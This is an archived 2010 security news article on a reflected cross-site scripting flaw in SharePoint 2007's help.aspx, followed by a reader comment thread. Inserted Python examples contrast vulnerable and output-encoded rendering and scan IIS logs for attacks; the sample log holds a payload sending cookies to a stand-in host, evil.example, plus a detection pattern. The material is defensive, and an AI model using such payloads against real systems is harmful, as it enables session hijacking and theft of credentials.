Zero Day

Ryan Naraine, Emil Protalinski and Dancho Danchev

Serious XSS flaw haunts Microsoft SharePoint

By Ryan Naraine | April 29, 2010, 12:58pm PDT

Summary: The vulnerability, which can be exploited via the browser, could allow a malicious hacker to execute arbitrary JavaScript code within the vulnerable application.

Microsoft’s security response team has confirmed the existence of a serious cross-site scripting (XSS) vulnerability in the Microsoft SharePoint Server 2007 product.

The vulnerability, which can be exploited via the browser, could allow a malicious hacker to execute arbitrary JavaScript code in the browser of anyone who follows a crafted link to the vulnerable application. A proof-of-concept exploit has been publicly posted and Microsoft is expected to issue a formal security advisory before the end of this week to offer pre-patch workarounds and mitigations.

Here’s the skinny on the flaw from an alert posted to the Full Disclosure mailing list:

The vulnerability exists due to failure in the “/_layouts/help.aspx” script to properly sanitize user-supplied input in the “cid0” variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

An attacker can use a browser to exploit this vulnerability.
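The alert above describes the whole bug in one sentence: a request parameter is copied into the page without encoding. The following is an added example, not SharePoint's code or anything from the Full Disclosure post (the real help.aspx is an ASP.NET page whose markup is not reproduced here, and the public proof-of-concept is not reproduced either). It models only the behaviour the alert describes, using Python as a stand-in for the server, with a constructed page template, a constructed probe string and a hypothetical host name. The vulnerable and hardened renderers sit side by side so the check a tester would run (does the probe come back byte-for-byte?) can be seen passing against one and failing against the other.

```python
"""
Reflected XSS modelled on the SharePoint help.aspx report.

Added example, not SharePoint's own code. Only the behaviour the alert
describes is modelled: the value of the "cid0" request parameter is copied
into the response without encoding. The hardened variant HTML-encodes at the
output point, which is the fix class for this bug.
"""
import html
from urllib.parse import parse_qs, urlsplit

# Constructed stand-in for the page template; the {cid0} slot is where the
# request parameter lands in the HTML.
TEMPLATE = ('<html><body><h1>Help</h1>'
            '<div id="topic">{cid0}</div></body></html>')


def cid0_from_url(url: str) -> str:
    """Extract cid0 from a request URL the way the server sees it (decoded)."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("cid0", [""])[0]


def render_help_vulnerable(cid0: str) -> str:
    """The flawed behaviour: parameter value concatenated into markup verbatim."""
    return TEMPLATE.format(cid0=cid0)


def render_help_fixed(cid0: str) -> str:
    """Same page with output encoding: angle brackets, ampersand and both quote
    characters become entities, so the browser treats the value as text."""
    return TEMPLATE.format(cid0=html.escape(cid0, quote=True))


def reflects_unencoded(response_body: str, probe: str) -> bool:
    """The check a tester runs: does the probe survive verbatim in the response?"""
    return probe in response_body


# Constructed probe; the public proof-of-concept is not reproduced here.
PROBE = "<script>document.title=1</script>"
# Constructed request URL, percent-encoded as a browser would send it.
# The host name is hypothetical.
ATTACK_URL = ("https://intranet.example/_layouts/help.aspx"
              "?cid0=%3Cscript%3Edocument.title%3D1%3C%2Fscript%3E")


if __name__ == "__main__":
    value = cid0_from_url(ATTACK_URL)
    print("vulnerable reflects probe:", reflects_unencoded(render_help_vulnerable(value), PROBE))
    print("fixed reflects probe:     ", reflects_unencoded(render_help_fixed(value), PROBE))
    print(render_help_fixed(value))
```

Two points worth noting. The fix is encoding at the point where the value enters HTML, not input "sanitizing" at the point where it arrives: a help topic id that legitimately contains an ampersand still renders correctly through `html.escape`, while an input filter would either mangle it or miss an encoding variant. And the probe check is only meaningful when the probe is unusual enough not to appear in the page by accident, which is why a tester uses a marker string rather than a bare `<script>` tag.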

On Twitter, Microsoft said it was aware of the issue and promised to issue guidance for affected customers.

This isn’t Microsoft SharePoint’s first brush with XSS security problems.  Back in 2007, the company shipped an “important” security patch to fix a flaw that allowed attackers to run arbitrary script that could result in elevation of privilege within a SharePoint site.


Ryan Naraine is a journalist and social media enthusiast specializing in Internet and computer security issues.

Disclosure

Ryan Naraine

The most important disclosure is of my employment with Kaspersky Lab as a member of the global research and analysis team. Kaspersky Lab is a global company specializing in anti-malware and secure content management technologies. I do not own stocks or other investments in any technology company.

Biography

Ryan Naraine

Ryan Naraine is a journalist and social media enthusiast specializing in Internet and computer security issues. He is currently security evangelist at Kaspersky Lab, an anti-malware company with operations around the globe. He is taking a leadership role in developing the company's online community initiative around secure content management technologies.

Prior to joining Kaspersky Lab, Ryan was Editor-at-Large/Security at eWEEK, leading the magazine's and Web site's coverage of Internet and computer security issues and managing the popular SecurityWatch blog, covering the daily threats, vulnerabilities and IT security technologies. He also covered IT security, hacker attacks and secure content management topics for Jupiter Media's internetnews.com.

Ryan can be reached at naraine SHIFT 2 gmail.com. For daily updates on Ryan's activities, follow him on Twitter.

Comments

maybe now the Linux
honeymonster 29th Apr 2010
zealots will agree that XSS is a server side vulnerability?
0 Votes
+ -
No
bobiroc 29th Apr 2010
you see SharePoint is still a Microsoft Product so they will have a field day with this one. Only if it is a Linux Server will they make up crap to try and fulfill their belief that anything Linux is secure by design.
0 Votes
+ -
It IS a Microsoft vulnerability
Great Kahuna Updated - 29th Apr 2010
only not a server vulnerability.

While in those other cases you mention Linux and Apache have got absolutely nothing to do with the vulnerability, they merely provide the platform, in this case Microsoft is 100% responsible for the vulnerability.
0 Votes
+ -
It's inherently a zero-security, disastrous language for developing web apps. This whole JS/XSS/CSS thing should be replaced with something new or it will keep going on like this.
I suggest you buy a few books to get started. Those in the "for dummies" collection are good choices for people with your current skill set.
LBiege is right. JavaScript like Microsoft is an example of what goes wrong when you try to be all things to all people.

When Netscape created JavaScript, they took the easy way (but they claimed to try to be universal to coders of different languages) and hacked together pieces (syntax) from different languages instead of originating a new language.

To expound on what I think LBiege is saying, the more dynamic (more work left to the compiler) a language is, the easier it is to code and the less prone to error on the part of the coder. It would stand to reason also that the more basic a language is, the easier it would be to find the fewer vulnerabilities.

Since JavaScript is a cobble of different languages it is far more complex than it needs to be. Python, Ruby, and even PHP are far better suited. But, who's going to turn the Titanic around at this point?
Wait, they are already here faster than you can 'troll'. Never mind.
Nothing to do with Windows vs Linux.
0 Votes
+ -
Nope!
Great Kahuna 29th Apr 2010
It's a web application vulnerability.

The server has got nothing to do with it.
0 Votes
+ -
Try reading my post again
honeymonster 29th Apr 2010
and, please, try to figure out what server side means.

When Apache's JIRA app was compromised through an XSS vuln you claimed it was an Internet Explorer vulnerability.
to steal the admin cookies/credentials.

Remember what happened with the Google China attack from December 2009? An MSIE 6 vulnerability was the cause of it all.
0 Votes
+ -
An XSS flaw in a web app has no more to do with Linux than this XSS flaw in Sharepoint has to do with Windows. The argument is that it's not a flaw in the SERVER. I mean why bother...we all know better and it's just fun and games anyway. Which leads me to the post I'm about to make...
This isn't a problem in Windows or IIS, but rather a problem in Microsoft SharePoint.

Just like the WordPress one wasn't a problem in Linux or Apache, but rather WordPress.




*except in the case of IE, which is such a horrible client it manages to make XSS attacks easier in its attempt to block them.
0 Votes
+ -
Re
dvm 29th Apr 2010
Are you sure about that?

"Microsoft sold 75 million through the end of 2005
and 25 million more in the last two years"

http://www.informationweek.com/news/internet/showArticle.jhtml?articleID=206901417
0 Votes
+ -
Sharepoint is a separate $$ item
Johnny Vegas 29th Apr 2010
It is sold. It generates over a Billion dollars a year for MS
0 Votes
+ -
Try commenting on a topic you know about
honeymonster 29th Apr 2010
It is obviously not Sharepoint.

Sharepoint is a content management and collaboration server. You cannot get it with Pro/Ultimate.

Sharepoint is a kick-ass product (for users) which sees tremendous success in enterprises because of its ease of use and (almost) first class integration with Office.

Suggesting that it was bundled with a client OS is, well, revealing.
0 Votes
+ -
Re:
dvm 30th Apr 2010
Short answer, NONE.
0 Votes
+ -
Are you stupid?
Johnny Vegas 29th Apr 2010
or was that just a humor=EPICFAIL on your part?
Sharepoint is used by about 100 million people every day.
0 Votes
+ -
RE: Serious XSS flaw haunts Microsoft SharePoint
Loverock Davidson 29th Apr 2010
Only a proof-of-concept so its not a threat. Since people only use SharePoint on internal networks and not publicly this isn't that big of a deal anyway. Any rogue employee that tries to exploit it will get fired very quickly.
I guess some things will never change.
a week just to offer some hacky workaround (most likely involving messing with the command line or registry), and god knows how long for an actual fix that most people will be able to apply.

In the mean time, black hats will probably make a real attack based on this vulnerability.
0 Votes
+ -
finally...
pgit 30th Apr 2010
Thank you. You finally admitted Linux is far more secure than windows, because 100% of all "exploits" in Linux have been "proof of concept" and never been seen in the wild, save like 3 Unix viruses that were taken care of in 1980-something.

Of course windows currently has 56,000 + active exploits in the wild, running somewhere as we speak.

It's about time this fellow came around, I KNEW it was only a matter of time! =D
0 Votes
+ -
wow... gullible...
erik.soderquist 4th May 2010
first: a proof of concept means the attack is possible, and that we have not detected it in the wild does not mean it isn't there already. as long as the vulnerability exist, it IS a threat

second: millions of SharePoint sites are public facing, and i've administered a couple hundred myself. the customer wants it and pays for it, the customer gets it.

third: the 'fired very quickly' scenario only works if you can prove it, and even then, firing the employee doesn't repair whatever damage was done. and if you fire for that reason without being able to prove it, you open yourself wrongful termination suits. and whatever the rogue has gained from the exploit is still stolen. i don't know about you, but i would find a fired employee very poor compensation for highly sensitive/trade secret data being stolen and sold to my competitors.
0 Votes
+ -
OMGWTFBBQ! A vulnerability!!!!!
Cylon Centurion Updated - 29th Apr 2010
Imperfect software coded by imperfect people. Imagine that. Would you people get over it?
I'm tired of seeing these arguments. Same damn thing every time, and what is the outcome?
0 Votes
+ -
What are you doing here then?
Great Kahuna 29th Apr 2010
Ah, I get it now. You're waiting for those posts selling shoes, ******** and the like. You need to buy some stuff on the cheap but forgot the links.

Don't worry pal, they will be here soon. Happy Shopping!
0 Votes
+ -
I don't think they are selling poker cards, only shoes, ******** and lingerie.

Hey, you need lingerie for poker, don't you? I mean strip poker, of course.
0 Votes
+ -
You replied twice?
Cylon Centurion Updated - 29th Apr 2010
ALL software has its flaws. I can't believe we have to argue about that.
Polar bears and humans are both not 100% covered in fur.
Linux and Windows are both not 100% immune to hackers.


But they aren't the same.

To clear up this confusion, I recommend the adoption of RSS (Relative Suckitude Scale); on one far extreme of this scale lay Microsoft products (100), and on the polar opposite, absolute 100% perfection (0).

You will find that many things are somewhere in between these two diametrically opposed opposites.
..a rag-tag group of volunteers messing around in their spare time.
0 Votes
+ -
Not surprising at all.
anothercanuck Updated - 29th Apr 2010
The goal of one group is separating you from your money. The goal of the other group is perfect code. No surprise at all and it seems both groups are achieving their goals.
0 Votes
+ -
Re:Wrong post
dvm Updated - 29th Apr 2010
NT
Who exposes SharePoint to the Internet in general?
0 Votes
+ -
Lots of people do
toadlife 29th Apr 2010
We have a public portal based on Sharepoint and, in the process of launching it, conversed with tons of other organizations that do too.
0 Votes
+ -
But when you do that
honeymonster 29th Apr 2010
you have probably developed a custom skin and the page in question is not available, right?
0 Votes
+ -
Idiots use Sharepoint for anything
itguy08 30th Apr 2010
Especially in the Internet.
0 Votes
+ -
Did SharePoint kill your dog or something?
crazydanr@... 30th Apr 2010
Every SP story on here you swing by and try to convince everyone it is junk. It's used by tens of thousands of businesses around the world, in a huge variety of deployment situations. It must be a little bit ok if there's that many people running it.

I don't know what it did to you to merit so much time bashing it, but I really think you should spend your time doing something more constructive.
0 Votes
+ -
First we had PowerPoint
ubiquitous one 30th Apr 2010
http://blogs.zdnet.com/storage/?p=878&tag=nl.e539

Now we have SharePoint.

So how many more M$ "Points" have to be deducted.

Hmmm?
0 Votes
+ -
Is this not an inherent server vulnerability issue?
Dietrich T. Schmitz, Your Linux Advocate Updated - 1st May 2010
Taken from:
http://en.wikipedia.org/wiki/Cross-site_scripting#Exploit_scenarios

Attackers intending to exploit cross-site scripting vulnerabilities must approach each class of vulnerability differently. For each class, a specific attack vector is described here. The names below are technical terms, taken from the cast of characters commonly used in computer security.

Non-persistent:

1. Alice often visits a particular website, which is hosted by Bob. Bob's website allows Alice to log in with a username/password pair and store sensitive information, such as billing information.
2. Mallory observes that Bob's website contains a reflected XSS vulnerability.
3. Mallory crafts a URL to exploit the vulnerability, and sends Alice an email, enticing her to click on a link for the URL under false pretenses. This URL will point to Bob's website, but will contain Mallory's malicious code, which the website will reflect.
4. Alice visits the URL provided by Mallory while logged into Bob's website.
5. The malicious script embedded in the URL executes in Alice's browser, as if it came directly from Bob's server (this is the actual XSS vulnerability). The script can be used to send Alice's session cookie to Mallory. Mallory can then use the session cookie to steal sensitive information available to Alice (authentication credentials, billing info, etc) without Alice's knowledge.

Persistent attack:

1. Mallory posts a message with malicious payload to a social network.
2. When Bob reads the message, Mallory's XSS steals Bob's cookie.
3. Mallory can now hijack Bob's session and impersonate Bob.

Framework:

A Browser Exploitation Framework could be used to attack the web site and the user's local environment.
0 Votes
+ -
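The non-persistent scenario quoted above turns on one artifact: a crafted URL to the vulnerable page that a victim is lured into opening. On the server side that URL leaves a trace in the web server log, which is what a defender has to work with while waiting for a patch. The following is an added example, not from the article, the advisory or Microsoft. It assumes IIS W3C extended logs in the default IIS 7 field order given in the `#Fields` line (the field set and its order are an assumption about the deployment), and that IIS writes `cs-uri-query` as received, so the scanner decodes the value itself. The log lines are constructed for the example; the hosts, users and addresses in them are made up.

```python
"""
Hunting for exploitation attempts against /_layouts/help.aspx in IIS logs.

Added example, not from the article, Microsoft or the advisory. It assumes
IIS W3C extended logs in the default IIS 7 field order given in the #Fields
line below; IIS writes cs-uri-query as received, so the scanner decodes it
before looking for script indicators. The log lines are constructed for this
example (hosts, users and addresses are made up).
"""
import re
from urllib.parse import parse_qs, unquote

SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 7.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2010-04-29 09:12:01 10.0.0.5 GET /_layouts/help.aspx cid0=MS.WSS.manifest.xml&lcid=1033 443 CORP\\alice 10.0.3.14 Mozilla/4.0+(compatible;+MSIE+8.0) 200 0 0 31
2010-04-29 09:14:22 10.0.0.5 GET /_layouts/help.aspx cid0=%3Cscript%3Edocument.location%3D'http://evil.example/?'%2Bdocument.cookie%3C/script%3E 443 CORP\\bob 10.0.7.9 Mozilla/4.0+(compatible;+MSIE+7.0) 200 0 0 28
2010-04-29 09:15:03 10.0.0.5 GET /_layouts/help.aspx cid0=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E 443 - 203.0.113.7 Mozilla/5.0 200 0 0 30
2010-04-29 09:16:40 10.0.0.5 GET /sites/hr/default.aspx - 443 CORP\\carol 10.0.3.20 Mozilla/4.0+(compatible;+MSIE+8.0) 200 0 0 45
"""

# Markup or script indicators in a parameter that should only ever hold a
# help topic id. Tuned for low noise on this parameter, not for completeness.
INDICATORS = re.compile(r"<|javascript:|\bon\w+\s*=", re.IGNORECASE)

HELP_STEM = "/_layouts/help.aspx"   # IIS paths are case-insensitive


def parse_iis_log(text: str):
    """Yield one dict per data line, keyed by the names in the #Fields line."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        parts = line.split(" ")          # IIS encodes spaces inside fields as '+'
        if fields and len(parts) == len(fields):
            yield dict(zip(fields, parts))


def cid0_value(raw_query: str) -> str:
    """cid0 as the application would see it, plus one extra decode round so a
    payload double-encoded to slip past a filter is still surfaced."""
    value = parse_qs(raw_query, keep_blank_values=True).get("cid0", [""])[0]
    return unquote(value)


def suspicious_help_requests(text: str) -> list:
    """Requests to help.aspx whose cid0 carries markup or script."""
    hits = []
    for rec in parse_iis_log(text):
        if rec["cs-uri-stem"].lower() != HELP_STEM or rec["cs-uri-query"] == "-":
            continue
        cid0 = cid0_value(rec["cs-uri-query"])
        if INDICATORS.search(cid0):
            hits.append({
                "time": rec["date"] + " " + rec["time"],
                "client": rec["c-ip"],
                "user": rec["cs-username"],
                "status": rec["sc-status"],
                "cid0": cid0,
            })
    return hits


if __name__ == "__main__":
    for hit in suspicious_help_requests(SAMPLE_LOG):
        print(hit)
```

The `sc-status` field matters when reading the hits: on an unpatched server a 200 means the page rendered the payload, so the second and third requests are not merely attempts. The `cs-username` field tells you which authenticated user's browser was driven to the URL, which is the victim in the scenario above, not the attacker; the attacker is whoever sent the link, and the log only shows the client address the victim came from.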
Yes it is
honeymonster Updated - 3rd May 2010
Cross Site Scripting (XSS) flaws are server side vulnerabilities. Some browsers may try to mitigate the *risk* by using heuristics to recognize an attack.

You just quoted two very good examples. Those two examples exploited server side (web application) vulnerabilities.

0 Votes
+ -
fuzziness...
erik.soderquist 4th May 2010
i think some of the confusion is coming from the fuzziness in the distinction between server and server side.

the delineation i have always used is that Windows/IIS or Linux/Apache is the server, and anything that resides between the server and the connection to the client, such as SharePoint, WordPress, etc, is server side. these are applications designed to run on the server and are dependent on the server's presence to function, but are still applications. they are server side because they literally reside on the server rather than the client, but are still applications.

i've little doubt that many will disagree with my delineations, but having a delineation spelled out, even one that is disagreed with or even flamed to death, i hope will help clarify that there is a difference between server and server side
0 Votes
+ -
"The vulnerability exists due to failure in the “/_layouts/help.aspx” script to properly sanitize user-supplied input in “cid0” variable."

Is it just me or are there others that find it rather unbelievable that such a basic thing as not trusting the user-supplied input lies at the base of this flaw?

What about some basic security education, guys!?
0 Votes
+ -
To AzuMao
jryanp 3rd May 2010
You, sir/madame, are a god/goddess among men.

Your posts make me laugh out loud as I hear various trolls explode.
Many companies use the flexibility and security of SharePoint (and AD) to generate Internet facing websites that allow them to share information with their employees, customers and partners without the need to fully sandbox the information on a separate external site.

Compromising security might not gain an intruder access to the full internal company network but could allow them to obtain sensitive information from other SharePoint sites on the same server.

Companies will crack down severely on any sort of employee access to the Internet through the company firewall but don't think twice using products from a major software vendor that expose them to many times the risk. This is a serious concern.
0 Votes
+ -
It's about time Microsoft were.....
carlsf@... Updated - 3rd May 2010
made responsible for their FAILINGS and inability to produce safe code/applications.

I hate to think how many times I have purchased a MS product (O/S, Application) to find it does NOT work as expected or has a major fault, and I have been with IT and using MS products for 23 years.

MS don't listen to their users, they just make changes for changes and remove features and components that people rely on to perform their jobs.

I/we have STOPPED the clock and will NOT be moving forward to MS's latest products. There are two main reasons and they are...
1) WIN7: they have changed the interface and moved too many things; they have made it unproductive. Also they have removed the "CLASSIC" option.
2) Office 2007/10: they have the HATED "RIBBON" interface and as in WIN7 removed the "CLASSIC" option.

We, as I said, have stopped and will be staying with XP/VISTA and on Office 2003.

MS's LOSS (115+ seats)
0 Votes
+ -